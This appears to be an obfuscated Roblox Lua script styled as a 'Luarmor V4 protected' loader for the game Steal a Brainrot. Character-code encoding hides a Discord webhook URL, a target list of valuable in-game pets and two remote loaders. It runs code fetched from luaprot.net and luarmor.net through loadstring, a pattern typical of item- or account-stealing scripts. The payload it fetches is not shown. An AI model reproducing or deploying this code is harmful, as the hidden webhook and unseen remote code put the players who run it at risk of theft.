-- Luarmor V4 | https://luarmor.net
-- Protected Script | DO NOT SHARE

local _ENV = getfenv()
local _0xCAFE = string.char
local _0xBEEF = table.concat
local _0xDEAD = function(_0x1) local _0x2={} for _0x3=1,#_0x1 do _0x2[#_0x2+1]=_0xCAFE(_0x1[_0x3]) end return _0xBEEF(_0x2) end
local _0xF00D = getgenv or function() return _ENV end
local _0xACE = _0xF00D()

_0xACE[_0xDEAD({115,101,99,114,101,116,54,55})] = _0xDEAD({49,52,55,54,52,54,57,55,49,48,50,53,55,50,54,50,54,50,50})
_0xACE[_0xDEAD({83,101,99,114,101,116,84,111,107,101,110})] = _0xDEAD({72,57,115,111,53})
_0xACE[_0xDEAD({85,115,101,114})] = _0xDEAD({72,57,115,111,53})
_0xACE[_0xDEAD({87,101,98,104,111,111,107})] = _0xDEAD({104,116,116,112,115,58,47,47,100,105,115,99,111,114,100,46,99,111,109,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,57,54,56,50,51,48,52,55,54,52,53,51,48,50,56,53,52,47,109,119,78,66,113,78,118,113,100,103,81,52,98,105,69,67,100,112,114,45,51,84,121,52,98,65,95,69,101,85,95,117,68,70,74,56,45,122,90,56,114,100,105,95,71,100,121,86,53,118,90,71,83,118,70,80,87,97,79,45,80,97,99,98,72,57,98,74})
_0xACE[_0xDEAD({66,114,97,105,110,114,111,116,115})] = {"Strawberry Elephant", "Meowl", "Headless Horseman", "Skibidi Toilet", "Griffin", "Hydra Dragon Cannelloni", "Dragon Gingerini", "Dragon Cannelloni", "Love Love Bear", "La Supreme Combinasion", "Celestial Pegasus", "Cerberus", "Popcuru and Fizzuru", "Rosey and Teddy", "Capitano Moby", "Cooki and Milki", "Burguro And Fryuro", "Ketupat Bros", "Reinito Sleighito", "Fortunu and Cashuru", "Los Amigos", "La Secret Combinasion", "Los Sekolahs", "Signore Carapace", "La Casa Boo", "Fragrama and Chocrama", "La Food Combinasion", "Elefanto Frigo", "Spooky and Pumpky", "Ginger Gerat", "La Ginger Sekolah", "Sammyni Fattini", "Los Spaghettis", "Festive 67", "Ventoliero Pavonero", "Cloverat Clapat", "Spaghetti Tualetti", "Antonio", "Rosetti Tualetti", "Nacho Spyder", "Garama and Madundung", "Fishino Clownino", "Gold Gold Gold", "Jolly Jolly Sahur", "Lavadorito Spinito", "Ketchuru and Musturu", "Tirilikalika Tirilikalako", "Swaggy Bros", "La Romantic Grande", "Orcaledon", "Tictac Sahur", "La Taco Combinasion", "Ketupat Kepat", "Dug dug dug", "Tang Tang Keletang", "Lovin Rose", "Los Tacoritas", "Eviledon", "Los Primos", "W or L", "Esok Sekolah", "La Jolly Grande", "Los Cupids", "Los Puggies", "Tralaledon", "Gobblino Uniciclino", "Tuff Toucan", "Mieteteira Bicicleteira", "Chipso and Queso", "Chillin Chili", "Money Money Reindeer", "La Spooky Grande", "Bacuru and Egguru", "Los Bros", "La Extinct Grande", "Los Candies", "Los 67", "Celularcini Viciosini", "Los Mobilis", "Money Money Puggy", "Cigno Fulgoro", "Los Spooky Combinasionas", "Los Hotspotsitos", "Los Jolly Combinasionas", "Snailo Clovero", "Los Planitos", "Chicleteira Cupideira", "DJ Panda", "Las Sis", "Spinny Hammy", "Tacorita Bicicleta", "Los Sweethearts", "Nuclearo Dinossauro", "Chicleteira Noelteira", "Los Combinasionas", "Chimnino", "Noo my Gold", "Swag Soda", "Noo my Heart", "Tacorillo Crocodillo", "Mariachi Corazoni", "La Grande Combinasion", "Los 25", "Los Burritos", "67", "Donkeyturbo Express", "Los Chicleteiras", "Guest 666", "Los Mi Gatitos", "Rang Ring Bus", "Granny", "Noo my Present", "Serafinna Medusella", "Los Nooo My Hotspotsitos", "Arcadopus", "Noo my Candy", "Los Quesadillas", "Chicleteirina Bicicleteirina", "Chill Puppy", "Burrito Bandito", "Luck Luck Luck Sahur", "Chicleteira Bicicleteira", "Brunito Marsito", "Quesadillo Vampiro", "Eid Eid Eid Sahur", "Cupid Hotspot", "Mi Gatito", "Ho Ho Ho Sahur", "Cupid Cupid Sahur", "Pot Pumpkin", "Naughty Naughty", "Bunito Bunito Spinito", "Quesadilla Crocodila", "Horegini Boom", "Santa Hotspot", "Pot Hotspot", "25", "Pirulitoita Bicicleteira", "To to to Sahur", "Telemorte", "La Sahur Combinasion", "List List List Sahur", "Noo my examine", "Los Jobcitos", "Nooo My Hotspot", "Bunnyman", "Tung Tung Tung Sahur", "Cuadramat and Pakrahmatmamat", "Please my Present", "Los Cucarachas", "1x1x1x1", "La Vacca Lepre Lepreino", "Love Love Love Sahur", "Perrito Burrito", "Graipuss Medussi", "Giftini Spyderini", "GOAT", "Trickolino", "Paradiso Axolottino", "Triplito Tralaleritos", "La Vacca Jacko Linterino", "Fishboard", "Santteo", "Las Vaquitas Saturnitas", "Los Karkeritos", "Karker Sahur", "Los Trios", "Job Job Job Sahur", "Frankentteo", "Pumpkini Spyderini", "Las Tralaleritas", "Rocco Disco", "Extinct Matteo", "La Karkerkar Combinasion", "La Vacca Prese Presente", "Reindeer Tralala", "Yess my examine", "Guerriro Digitale", "Boatito Auratito", "Vulturino Skeletono", "Los Tralaleritos", "Zombie Tralala", "Los Tortus", "La Cucaracha", "Fragola La La La", "Extinct Tralalero", "Agarrini la Palini", "Los Spyderinis", "Chachechi", "Blackhole Goat", "Dul Dul Dul", "Torrtuginni Dragonfrutini", "Trenostruzzo Turbo 4000", "Karkerkar Kurkur", "Los Matteos", "Bisonte Giuppitere", "Sammyni Spyderini", "La Vacca Saturno Saturnita", "Jackorilla", "Secret Lucky Block", "Noobini Pizzanini", "Lirilì Larilà", "Tim Cheese", "Fluriflura", "Talpa Di Fero", "Svinina Bombardino", "Pipi Kiwi", "Noobini Santanini", "Raccooni Jandelini", "Tartaragno", "Pipi Corni", "Holy Arepa", "Trippi Troppi", "Gangster Footera", "Bandito Bobritto", "Boneca Ambalabu", "Cacto Hipopotamo", "Ta Ta Ta Ta Sahur", "Tric Trac Baraboom", "Cupcake Koala", "Frogo Elfo", "Pipi Avocado", "Pengolino Nuvoletto", "Pinealotto Fruttarino", "Cappuccino Assassino", "Brr Brr Patapim", "Avocadini Antilopini", "Trulimero Trulicina", "Bambini Crostini", "Bananita Dolphinita", "Perochello Lemonchello", "Brri Brri Bicus Dicus Bombicus", "Avocadini Guffo", "Salamino Penguino", "Wombo Rollo", "Bandito Axolito", "Malame Amarele", "Ti Ti Ti Sahur", "Mangolini Parrocini", "Frogato Pirato", "Gato Celesto", "Doi Doi Do", "Penguin Tree", "Penguino Cocosino", "Mummio Rappitto", "Burbaloni Loliloli", "Chimpanzini Bananini", "Ballerina Cappuccina", "Chef Crabracadabra", "Lionel Cactuseli", "Glorbo Fruttodrillo", "Quivioli Ameleonni", "Blueberrinni Octopusini", "Pipi Potato", "Strawberrelli Flamingelli", "Pandaccini Bananini", "Sigma Boy", "Clickerino Crabo", "Caramello Filtrello", "Cocosini Mama", "Quackula", "Pi Pi Watermelon", "Buho del Cielo", "Chocco Bunny", "Puffaball", "Sigma Girl", "Sealo Regalo", "Buho de Fuego", "Seraphino Gruyero", "Mythic Lucky Block", "Frigo Camelo", "Orangutini Ananassini", "Rhino Toasterino", "Bombardiro Crocodilo", "Bombombini Gusini", "Cavallo Virtuoso", "Gorillo Watermelondrillo", "Lerulerulerule", "Te Te Te Sahur", "Tracoducotulu Delapeladustuz", "Cachorrito Melonito", "Toiletto Focaccino", "Brutto Gialutto", "Spioniro Golubiro", "Zibra Zubra Zibralini", "Tigrilini Watermelini", "Avocadorilla", "Gorillo Subwoofero", "Stoppo Luminino", "Tob Tobi Tobi", "Ganganzelli Trulala", "Rhino Helicopterino", "Magi Ribbitini", "Jingle Jingle Sahur", "Los Noobinis", "Spongini Quackini", "Carloo", "Harpuccino", "Carrotini Brainini", "Centrucci Nuclucci", "Jacko Spaventosa", "Bananito Bandito", "Tree Tree Tree Sahur", "Fizzy Soda", "Berenjello Angello", "Brainrot God Lucky Block", "Cocofanto Elefanto", "Girafa Celestre", "Tralalero Tralala", "Odin Din Din Dun", "Tralalita Tralala", "Trenostruzzo Turbo 3000", "Trippi Troppi Troppa Trippa", "Ballerino Lololo", "Pakrahmatmamat", "Piccione Macchina", "Tractoro Dinosauro", "Cacasito Satalito", "Aquanaut", "Pineaplino", "Lazy Ducky", "Appelini", "Gattatino Nyanino", "Chihuanini Taconini", "Matteo", "Los Crocodillitos", "Tigroligre Frutonni", "Money Money Man", "Alessio", "Tipi Topi Taco", "Unclito Samito", "Tukanno Bananno", "Extinct Ballerina", "Vampira Cappucina", "Espresso Signora", "Orcalero Orcala", "Jacko Jack Jack", "Urubini Flamenguini", "Capi Taco", "Divino Platypio", "Los Chihuaninis", "Gattito Tacoto", "Las Capuchinas", "Bulbito Bandito Traktorito", "Los Tungtungtungcitos", "Ballerina Peppermintina", "Brr es Teh Patipum", "Pakrahmatmatina", "Los Bombinitos", "Los Orcalitos", "Orcalita Orcala", "Corn Corn Corn Sahur", "Mummy Ambalabu", "Snailenzo", "Squalanana", "Tartaruga Cisterna", "Ginger Globo", "Yeti Claus", "Crabbo Limonetta", "Granchiello Spiritell", "Tootini Shrimpini", "Los Tipi Tacos", "Frio Ninja", "Buho de Noelo", "Piccionetta Machina", "Boba Panda", "Mastodontico Telepiedone", "Los Gattitos", "Bambu Bambu Sahur", "Chrismasmamat", "Anpali Babel", "Astrolero Cervalero", "Luv Luv Luv", "Cappuccino Clownino", "Bombardini Tortinii", "Brasilini Berimbini", "Patteo", "Belula Beluga", "Krupuk Pagi Pagi", "Skull Skull Skull", "Cocoa Assassino", "Tentacolo Tecnico", "Ginger Cisterna", "Pandanini Frostini", "Dolphini Jetskini", "Pop Pop Sahur", "Bunny Tralala", "Noo La Polizia", "Karkerheart Luvkur", "Clovkur Kurkur", "Eggdin Egg Egg Dun", "Dumborino Miracello", "Berryno", "Strawberrita", "Bananito", "Cash or Card", "Buntteo", "Easter Easter Easter Sahur", "Coffin Tung Tung Tung Sahur", "Bunny Bunny Bunny Sahur", "Los Bunitos", "Noo my Eggs", "Baskito", "Churrito Bunnito", "La Lucky Grande", "La Easter Grande", "Hopilikalika Hopilikalako", "Quackini Snackini", "Boppin Bunny", "Foxini Lanternini", "Bunny and Eggy", "Hydra Bunny", "Smurf Cat", "John Pork", "Admin Lucky Block", "Los Lucky Blocks", "Taco Lucky Block", "Los Taco Blocks", "Spooky Lucky Block", "Festive Lucky Block", "Heart Lucky Block", "Leprechaun Lucky Block", "Egg Lucky Block", "Gold Elf", "Chimpanzini Spiderini", "Statutino Libertino", "Gattatino Neonino", "Ice Dragon"}
_0xACE[_0xDEAD({83,99,114,105,112,116,77,111,100,101})] = _0xDEAD({67,85,83,84,79,77})
_0xACE[_0xDEAD({67,117,115,116,111,109,83,99,114,105,112,116})] = _0xDEAD({98,71,57,104,90,72,78,48,99,109,108,117,90,121,104,110,89,87,49,108,79,107,104,48,100,72,66,72,90,88,81,111,73,109,104,48,100,72,66,122,79,105,56,118,89,88,66,112,76,109,120,49,89,88,74,116,98,51,73,117,98,109,86,48,76,50,90,112,98,71,86,122,76,51,89,48,76,50,120,118,89,87,82,108,99,110,77,118,90,109,81,53,77,106,66,107,77,109,77,52,78,50,69,53,78,87,86,108,78,84,99,122,90,68,90,109,90,71,85,121,77,122,108,105,78,106,78,107,77,84,85,117,98,72,86,104,73,105,107,112,75,67,107,61})
task.spawn(function()
loadstring(game:HttpGet(_0xDEAD({104,116,116,112,115,58,47,47,108,117,97,112,114,111,116,46,110,101,116,47,97,112,105,47,118,49,47,108,111,97,100,101,114,115,47,103,101,116,47,54,53,51,55,57,54,55,50,52,57,48,55,50,48,51,54,50,56,53,52})))()
end)
-- Custom Script
task.spawn(function()
loadstring(game:HttpGet(_0xDEAD({104,116,116,112,115,58,47,47,97,112,105,46,108,117,97,114,109,111,114,46,110,101,116,47,102,105,108,101,115,47,118,52,47,108,111,97,100,101,114,115,47,102,100,57,50,48,100,50,99,56,55,97,57,53,101,101,53,55,51,100,54,102,100,101,50,51,57,98,54,51,100,49,53,46,108,117,97})))()
end)

-- Luarmor V4 Protected | Fingerprint: 8a417fbb3fb8b5d0
